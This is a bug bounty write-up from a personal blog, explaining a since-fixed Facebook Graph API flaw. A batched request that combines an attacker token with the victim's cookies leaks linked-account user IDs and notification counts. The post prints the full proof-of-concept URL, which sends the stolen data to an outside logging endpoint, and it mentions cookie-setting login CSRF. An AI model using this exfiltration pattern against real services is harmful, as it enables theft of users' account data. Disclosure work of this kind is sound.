<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Leaking Facebook user information to external websites / Setting some cookies values | Youssef Sammouda (sam0) personal blog</title>
<meta name="generator" content="Jekyll v4.3.4" />
<meta property="og:title" content="Leaking Facebook user information to external websites / Setting some cookies values" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Description This bug could allow an attacker to leak Facebook user information to malicious individuals without user interaction. This bug occurs because certain GraphQL queries/mutation would return information based on the cookies of the user, if an attacker can force the victim to perform a request to&nbsp;https://graph.facebook.com/&nbsp;domain with his own access_token, the action (mutation/query) would be performed in the contest of his account however the logged-in user cookies will be sent along with the request.To defend against this type of attacks, the&nbsp;graph.facebook.com&nbsp;domain would only return data if no credentials were included ( Access-Control-Allow-Origin: * ). To bypass this and get the returned data, an attacker could exploit the fact that&nbsp;graph.facebook.com&nbsp;allows batched requests via the batch parameter and allows the result of each operation to be included in another request. This would mean that the attacker can get the data from the first request and send it to his website with the data appended via scraping it via the API. Reproduction Steps Trying to exploit this, i looked for graphql queries or&nbsp;graph.facebook.com&nbsp;endpoints that would return data based on user cookies and i found a couple but i&#39;m sure more exists. The attacker can exploits the account switching feature on Facebook website. Comet has a query which would return information about accounts that the current user can switch to (based on the sb cookie). This query would leak all accounts logged-in in the victim device before (info like user id,name,unread notifications count). The GraphQL query is with doc_id=3114557815333936. We would make the query using the attacker access_token, however the cookies of the victim would be fetched to get the information. The request to&nbsp;graph.facebook.com&nbsp;domain would be something similar to this: (could be embedded in an img tag for example) https://graph.facebook.com/?access_token=ATTACKER_ACCESS_TOKEN&amp;batch=[{&quot;method&quot;:&quot;POST&quot;,&quot;name&quot;:&quot;test&quot;,&quot;relative_url&quot;:&quot;graphql&quot;,&quot;body&quot;:&quot;doc_id=3114557815333936&quot;},{&quot;method&quot;:&quot;POST&quot;,&quot;relative_url&quot;:&quot;/&quot;,&quot;body&quot;:&quot;scrape=true&amp;id=https://ysamm.com/log.php?{result=test:$.data.viewer.device_switchable_accounts..user.id}&quot;},{&quot;method&quot;:&quot;POST&quot;,&quot;relative_url&quot;:&quot;/&quot;,&quot;body&quot;:&quot;scrape=true&amp;id=https://ysamm.com/log.php?{result=test:$.data.viewer.device_switchable_accounts..unread_notification_count}&quot;}]&amp;method=POST Where ATTACKER_ACCESS_TOKEN is a first_party access token of an attacker account.doc_id=3114557815333936 is the id for the graphql query which would return the data.https://ysamm.com/log.php? is used for logging the response ( here we use URL scraping via API, we can use feed posting too){result=test:$.data.viewer.device_switchable_accounts.*.user.id} for example is the result from the first operation named &quot;test&quot; and would get us the user id Few scenarios that i would like to mention that i&#39;m not sure they&#39;d work: - Leaking data via datr cookie. Not sure what that cookie saves but i think it&#39;s related to the device/location/browser.- Other queries than 3114557815333936 were found which would allow setting some cookies values (&quot;dbln&quot; and &quot;i_user&quot; cookies) which would allow login CSRFs- Batch requests via&nbsp;https://graph.facebook.com/?batch&nbsp;would return headers too. If cookies are embedded too along the access_token in these requests sent internally, then if the user session is old enough, we would get a set-cookie header in the response that would be returned to us. This attack would require a batch request embedded inside a batch request (to leak headers) however this is not currently possible by design (bypass wasn&#39;t found) Timeline Oct 22, 2020&mdash; Report Sent Dec 29, 2020&mdash;  Acknowledged by FacebookJan 22, 2021&mdash; Fixed by FacebookFeb 1, 2021 &mdash; $2000 bounty awarded by Facebook." />
<meta property="og:description" content="Description This bug could allow an attacker to leak Facebook user information to malicious individuals without user interaction. This bug occurs because certain GraphQL queries/mutation would return information based on the cookies of the user, if an attacker can force the victim to perform a request to&nbsp;https://graph.facebook.com/&nbsp;domain with his own access_token, the action (mutation/query) would be performed in the contest of his account however the logged-in user cookies will be sent along with the request.To defend against this type of attacks, the&nbsp;graph.facebook.com&nbsp;domain would only return data if no credentials were included ( Access-Control-Allow-Origin: * ). To bypass this and get the returned data, an attacker could exploit the fact that&nbsp;graph.facebook.com&nbsp;allows batched requests via the batch parameter and allows the result of each operation to be included in another request. This would mean that the attacker can get the data from the first request and send it to his website with the data appended via scraping it via the API. Reproduction Steps Trying to exploit this, i looked for graphql queries or&nbsp;graph.facebook.com&nbsp;endpoints that would return data based on user cookies and i found a couple but i&#39;m sure more exists. The attacker can exploits the account switching feature on Facebook website. Comet has a query which would return information about accounts that the current user can switch to (based on the sb cookie). This query would leak all accounts logged-in in the victim device before (info like user id,name,unread notifications count). The GraphQL query is with doc_id=3114557815333936. We would make the query using the attacker access_token, however the cookies of the victim would be fetched to get the information. The request to&nbsp;graph.facebook.com&nbsp;domain would be something similar to this: (could be embedded in an img tag for example) https://graph.facebook.com/?access_token=ATTACKER_ACCESS_TOKEN&amp;batch=[{&quot;method&quot;:&quot;POST&quot;,&quot;name&quot;:&quot;test&quot;,&quot;relative_url&quot;:&quot;graphql&quot;,&quot;body&quot;:&quot;doc_id=3114557815333936&quot;},{&quot;method&quot;:&quot;POST&quot;,&quot;relative_url&quot;:&quot;/&quot;,&quot;body&quot;:&quot;scrape=true&amp;id=https://ysamm.com/log.php?{result=test:$.data.viewer.device_switchable_accounts..user.id}&quot;},{&quot;method&quot;:&quot;POST&quot;,&quot;relative_url&quot;:&quot;/&quot;,&quot;body&quot;:&quot;scrape=true&amp;id=https://ysamm.com/log.php?{result=test:$.data.viewer.device_switchable_accounts..unread_notification_count}&quot;}]&amp;method=POST Where ATTACKER_ACCESS_TOKEN is a first_party access token of an attacker account.doc_id=3114557815333936 is the id for the graphql query which would return the data.https://ysamm.com/log.php? is used for logging the response ( here we use URL scraping via API, we can use feed posting too){result=test:$.data.viewer.device_switchable_accounts.*.user.id} for example is the result from the first operation named &quot;test&quot; and would get us the user id Few scenarios that i would like to mention that i&#39;m not sure they&#39;d work: - Leaking data via datr cookie. Not sure what that cookie saves but i think it&#39;s related to the device/location/browser.- Other queries than 3114557815333936 were found which would allow setting some cookies values (&quot;dbln&quot; and &quot;i_user&quot; cookies) which would allow login CSRFs- Batch requests via&nbsp;https://graph.facebook.com/?batch&nbsp;would return headers too. If cookies are embedded too along the access_token in these requests sent internally, then if the user session is old enough, we would get a set-cookie header in the response that would be returned to us. This attack would require a batch request embedded inside a batch request (to leak headers) however this is not currently possible by design (bypass wasn&#39;t found) Timeline Oct 22, 2020&mdash; Report Sent Dec 29, 2020&mdash;  Acknowledged by FacebookJan 22, 2021&mdash; Fixed by FacebookFeb 1, 2021 &mdash; $2000 bounty awarded by Facebook." />
<link rel="canonical" href="https://ysamm.com/uncategorized/2021/02/17/leaking-facebook-user-information-to-external-websites-setting-some-cookies-values.html" />
<meta property="og:url" content="https://ysamm.com/uncategorized/2021/02/17/leaking-facebook-user-information-to-external-websites-setting-some-cookies-values.html" />
<meta property="og:site_name" content="Youssef Sammouda (sam0) personal blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2021-02-17T11:11:36+02:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Leaking Facebook user information to external websites / Setting some cookies values" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2021-02-17T11:11:36+02:00","datePublished":"2021-02-17T11:11:36+02:00","description":"Description This bug could allow an attacker to leak Facebook user information to malicious individuals without user interaction. This bug occurs because certain GraphQL queries/mutation would return information based on the cookies of the user, if an attacker can force the victim to perform a request to&nbsp;https://graph.facebook.com/&nbsp;domain with his own access_token, the action (mutation/query) would be performed in the contest of his account however the logged-in user cookies will be sent along with the request.To defend against this type of attacks, the&nbsp;graph.facebook.com&nbsp;domain would only return data if no credentials were included ( Access-Control-Allow-Origin: * ). To bypass this and get the returned data, an attacker could exploit the fact that&nbsp;graph.facebook.com&nbsp;allows batched requests via the batch parameter and allows the result of each operation to be included in another request. This would mean that the attacker can get the data from the first request and send it to his website with the data appended via scraping it via the API. Reproduction Steps Trying to exploit this, i looked for graphql queries or&nbsp;graph.facebook.com&nbsp;endpoints that would return data based on user cookies and i found a couple but i&#39;m sure more exists. The attacker can exploits the account switching feature on Facebook website. Comet has a query which would return information about accounts that the current user can switch to (based on the sb cookie). This query would leak all accounts logged-in in the victim device before (info like user id,name,unread notifications count). The GraphQL query is with doc_id=3114557815333936. We would make the query using the attacker access_token, however the cookies of the victim would be fetched to get the information. The request to&nbsp;graph.facebook.com&nbsp;domain would be something similar to this: (could be embedded in an img tag for example) https://graph.facebook.com/?access_token=ATTACKER_ACCESS_TOKEN&amp;batch=[{&quot;method&quot;:&quot;POST&quot;,&quot;name&quot;:&quot;test&quot;,&quot;relative_url&quot;:&quot;graphql&quot;,&quot;body&quot;:&quot;doc_id=3114557815333936&quot;},{&quot;method&quot;:&quot;POST&quot;,&quot;relative_url&quot;:&quot;/&quot;,&quot;body&quot;:&quot;scrape=true&amp;id=https://ysamm.com/log.php?{result=test:$.data.viewer.device_switchable_accounts..user.id}&quot;},{&quot;method&quot;:&quot;POST&quot;,&quot;relative_url&quot;:&quot;/&quot;,&quot;body&quot;:&quot;scrape=true&amp;id=https://ysamm.com/log.php?{result=test:$.data.viewer.device_switchable_accounts..unread_notification_count}&quot;}]&amp;method=POST Where ATTACKER_ACCESS_TOKEN is a first_party access token of an attacker account.doc_id=3114557815333936 is the id for the graphql query which would return the data.https://ysamm.com/log.php? is used for logging the response ( here we use URL scraping via API, we can use feed posting too){result=test:$.data.viewer.device_switchable_accounts.*.user.id} for example is the result from the first operation named &quot;test&quot; and would get us the user id Few scenarios that i would like to mention that i&#39;m not sure they&#39;d work: - Leaking data via datr cookie. Not sure what that cookie saves but i think it&#39;s related to the device/location/browser.- Other queries than 3114557815333936 were found which would allow setting some cookies values (&quot;dbln&quot; and &quot;i_user&quot; cookies) which would allow login CSRFs- Batch requests via&nbsp;https://graph.facebook.com/?batch&nbsp;would return headers too. If cookies are embedded too along the access_token in these requests sent internally, then if the user session is old enough, we would get a set-cookie header in the response that would be returned to us. This attack would require a batch request embedded inside a batch request (to leak headers) however this is not currently possible by design (bypass wasn&#39;t found) Timeline Oct 22, 2020&mdash; Report Sent Dec 29, 2020&mdash;  Acknowledged by FacebookJan 22, 2021&mdash; Fixed by FacebookFeb 1, 2021 &mdash; $2000 bounty awarded by Facebook.","headline":"Leaking Facebook user information to external websites / Setting some cookies values","mainEntityOfPage":{"@type":"WebPage","@id":"https://ysamm.com/uncategorized/2021/02/17/leaking-facebook-user-information-to-external-websites-setting-some-cookies-values.html"},"url":"https://ysamm.com/uncategorized/2021/02/17/leaking-facebook-user-information-to-external-websites-setting-some-cookies-values.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/main.css"><link type="application/atom+xml" rel="alternate" href="https://ysamm.com/feed.xml" title="Youssef Sammouda (sam0) personal blog" /></head>
<body><header class="site-header" role="banner">

  <div class="wrapper"><a class="site-title" rel="author" href="/">Youssef Sammouda (sam0) personal blog</a><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"/>
            </svg>
          </span>
        </label>

        <div class="trigger"><a class="page-link" href="/about/">About</a></div>
      </nav></div>
</header>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">Leaking Facebook user information to external websites / Setting some cookies values</h1>
    <p class="post-meta">
      <time class="dt-published" datetime="2021-02-17T11:11:36+02:00" itemprop="datePublished">Feb 17, 2021
      </time></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody">
    <p><!-- wp:paragraph --></p>
<p><strong>Description</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>This bug could allow an attacker to leak Facebook user information to malicious individuals without user interaction. This bug occurs because certain GraphQL queries/mutation would return information based on the cookies of the user,<!--more--> if an attacker can force the victim to perform a request to&nbsp;<a rel="noreferrer noopener" href="https://graph.facebook.com/" target="_blank">https://graph.facebook.com/</a>&nbsp;domain with his own access_token, the action (mutation/query) would be performed in the contest of his account however the logged-in user cookies will be sent along with the request.<br><br>To defend against this type of attacks, the&nbsp;<a rel="noreferrer noopener" href="http://graph.facebook.com/" target="_blank">graph.facebook.com</a>&nbsp;domain would only return data if no credentials were included ( Access-Control-Allow-Origin: * ). To bypass this and get the returned data, an attacker could exploit the fact that&nbsp;<a rel="noreferrer noopener" href="http://graph.facebook.com/" target="_blank">graph.facebook.com</a>&nbsp;allows batched requests via the batch parameter and allows the result of each operation to be included in another request. This would mean that the attacker can get the data from the first request and send it to his website with the data appended via scraping it via the API.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Reproduction Steps</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Trying to exploit this, i looked for graphql queries or&nbsp;<a rel="noreferrer noopener" href="http://graph.facebook.com/" target="_blank">graph.facebook.com</a>&nbsp;endpoints that would return data based on user cookies and i found a couple but i'm sure more exists. The attacker can exploits the account switching feature on Facebook website. Comet has a query which would return information about accounts that the current user can switch to (based on the sb cookie). This query would leak all accounts logged-in in the victim device before (info like user id,name,unread notifications count). The GraphQL query is with doc_id=3114557815333936. We would make the query using the attacker access_token, however the cookies of the victim would be fetched to get the information.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The request to&nbsp;<a href="http://graph.facebook.com/" rel="noreferrer noopener" target="_blank">graph.facebook.com</a>&nbsp;domain would be something similar to this: (could be embedded in an img tag for example)</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>https://graph.facebook.com/?access_token=ATTACKER_ACCESS_TOKEN&amp;batch=[{"method":"POST","name":"test","relative_url":"graphql","body":"doc_id=3114557815333936"},{"method":"POST","relative_url":"/","body":"scrape=true&amp;id=https://ysamm.com/log.php?{result=test:$.data.viewer.device_switchable_accounts..user.id}"},{"method":"POST","relative_url":"/","body":"scrape=true&amp;id=https://ysamm.com/log.php?{result=test:$.data.viewer.device_switchable_accounts..unread_notification_count}"}]&amp;method=POST</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Where ATTACKER_ACCESS_TOKEN is a first_party access token of an attacker account.<br>doc_id=3114557815333936 is the id for the graphql query which would return the data.<br><a rel="noreferrer noopener" href="https://l.facebook.com/l.php?u=https%3A%2F%2Fysamm.com%2Flog.php%3Ffbclid%3DIwAR1vL721CKzF3UWxeH9GTfVAblnDxZ3erq6AS9dQPuLZhCxk3Tu7JSxD_WE&amp;h=AT3FV3eztWCY1hybfF79TmXT71iR55cefzDnEZFXpkRklCQXkjNE16U5TvH1QtJLQzC6T2qvZxpEkkfPHH3UvI88zgSHHdMHfJRsPp4D8k0LYvRRchxdh9D2llQ47A" target="_blank">https://ysamm.com/log.php</a>? is used for logging the response ( here we use URL scraping via API, we can use feed posting too)<br>{result=test:$.data.viewer.device_switchable_accounts.*.user.id} for example is the result from the first operation named "test" and would get us the user id</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Few scenarios that i would like to mention that i'm not sure they'd work:</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>- Leaking data via datr cookie. Not sure what that cookie saves but i think it's related to the device/location/browser.<br>- Other queries than 3114557815333936 were found which would allow setting some cookies values ("dbln" and "i_user" cookies) which would allow login CSRFs<br>- Batch requests via&nbsp;<a rel="noreferrer noopener" href="https://graph.facebook.com/?batch" target="_blank">https://graph.facebook.com/?batch</a>&nbsp;would return headers too. If cookies are embedded too along the access_token in these requests sent internally, then if the user session is old enough, we would get a set-cookie header in the response that would be returned to us. This attack would require a batch request embedded inside a batch request (to leak headers) however this is not currently possible by design (bypass wasn't found)</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Timeline</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Oct 22, 2020&mdash; Report Sent <br>Dec 29, 2020&mdash;  Acknowledged by Facebook<br>Jan 22, 2021&mdash; Fixed by Facebook<br>Feb 1, 2021 &mdash; $2000 bounty awarded by Facebook.</p>
<p><!-- /wp:paragraph --></p>

  </div><a class="u-url" href="/uncategorized/2021/02/17/leaking-facebook-user-information-to-external-websites-setting-some-cookies-values.html" hidden></a>
</article>

      </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

  <div class="wrapper">

    <h2 class="footer-heading">Youssef Sammouda (sam0) personal blog</h2>

    <div class="footer-col-wrapper">
      <div class="footer-col footer-col-1">
        <ul class="contact-list">
          <li class="p-name">Youssef Sammouda (sam0) personal blog</li><li><a class="u-email" href="mailto:ysamm@proton.me">ysamm@proton.me</a></li></ul>
      </div>

      <div class="footer-col footer-col-2"><ul class="social-media-list"><li><a href="https://github.com/samm0uda"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#github"></use></svg> <span class="username">samm0uda</span></a></li><li><a href="https://www.twitter.com/samm0uda"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#twitter"></use></svg> <span class="username">samm0uda</span></a></li></ul>
</div>

      <div class="footer-col footer-col-3">
        <p>The goal of this blog is to share write-ups about bugs i have found in Facebook and reported to them under the Facebook bug bounty program.</p>
      </div>
    </div>

  </div>

</footer>
</body>

</html>
